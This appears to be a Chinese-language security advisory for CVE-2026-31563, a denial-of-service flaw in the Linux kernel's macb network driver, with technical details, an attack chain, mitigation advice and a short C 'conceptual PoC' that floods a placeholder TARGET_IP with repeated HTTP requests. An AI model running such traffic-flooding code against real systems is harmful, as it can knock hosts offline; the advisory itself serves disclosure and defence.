CVE-2026-31563 CVSS 7.5 高危

CVE-2026-31563 Linux内核macb驱动DoS漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31563

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的macb驱动程序存在一个漏洞。由于在IRQ被禁用的上下文中错误地调用了napi_consume_skb()函数来释放TX SKBs，导致内核产生WARNING警告，并可能引发系统不稳定或拒绝服务。该问题由之前的锁机制变更引入。

技术细节

该漏洞源于macb驱动程序在处理TX（发送）SKB释放时的逻辑错误。在引入commit 6bc8a5098bf4后，驱动在持有自旋锁（即IRQ禁用状态）下释放SKB。此时调用的napi_consume_skb()试图在软中断上下文中操作，触发了__local_bh_enable_ip中的检查机制，导致内核恐慌或挂起。攻击者可以通过发送特制网络流量触发该驱动路径，导致目标系统崩溃。修复补丁建议使用dev_consume_skb_any()替代原函数，以适配任意上下文。

攻击链分析

STEP 1

步骤1

攻击者向受影响设备的网络接口发送数据包。

STEP 2

步骤2

Linux内核的macb驱动程序处理发送（TX）操作，并在持有锁（IRQ禁用）的上下文中准备释放SKB缓冲区。

STEP 3

步骤3

驱动程序错误地调用napi_consume_skb()，该函数检测到不正确的上下文（IRQ已禁用）。

STEP 4

步骤4

内核触发WARNING警告并进入panic状态或导致ksoftirqd进程异常，造成系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for triggering TX path in macb driver.
 * Requires a system with the vulnerable macb driver hardware.
 * Sending high volume of traffic may trigger the race condition.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in server;
    char *message;

    // Create socket
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("Could not create socket");
        return 1;
    }

    server.sin_addr.s_addr = inet_addr("TARGET_IP"); // Replace with target IP
    server.sin_family = AF_INET;
    server.sin_port = htons(80);

    if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
        perror("Connect failed");
        return 1;
    }

    message = "GET / HTTP/1.1\r\n\r\n";
    // Send repeated packets to stress TX path
    for(int i=0; i<10000; i++) {
        if (send(sock, message, strlen(message), 0) < 0) {
            perror("Send failed");
            break;
        }
    }

    close(sock);
    return 0;
}

影响范围

Linux Kernel (带有macb驱动且包含commit 6bc8a5098bf4但未包含修复补丁的版本)

防御指南

临时缓解措施

限制网络流量以减少触发TX处理的机会，或暂时禁用受影响的网络接口（如果有备用接口）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表